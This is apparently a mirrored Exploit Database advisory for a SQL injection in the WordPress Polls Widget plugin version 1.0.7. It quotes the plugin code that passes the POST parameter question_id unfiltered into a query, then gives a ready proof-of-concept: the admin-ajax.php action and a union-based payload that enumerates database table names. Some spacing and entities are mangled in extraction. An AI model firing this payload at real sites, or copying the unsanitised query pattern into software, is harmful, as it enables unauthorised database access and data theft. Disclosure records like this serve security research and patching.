WordPress Plugin Polls Widget 1.0.7 – SQL Injection

• Exploit Database
• 120 阅读

• 作者： WICS
  日期： 2015-12-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38902/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability Author : WICS Date : 7/12/2015 Software Link: https://wordpress.org/plugins/polls-widget/ Affected Version: 1.0.7 and below     Overview:     Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll. Thisplugin has 2000+ active installations. Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id line no. 36$question_id=$_POST[&apos;question_id&apos;]; .... .... line no. 94-->$answer=$wpdb->get_results(&apos;SELECT <code>answer_name</code>,<code>vote</code> FROM &apos;.$wpdb->prefix.&apos;polls WHERE question_id=&apos;.$question_id,ARRAY_A); print_r(json_encode($answer, JSON_FORCE_OBJECT));   this script is vulnerable to union based sql injection with column count 2     POC   http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues   in post data, add this   question_id=1337 union selectgroup_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5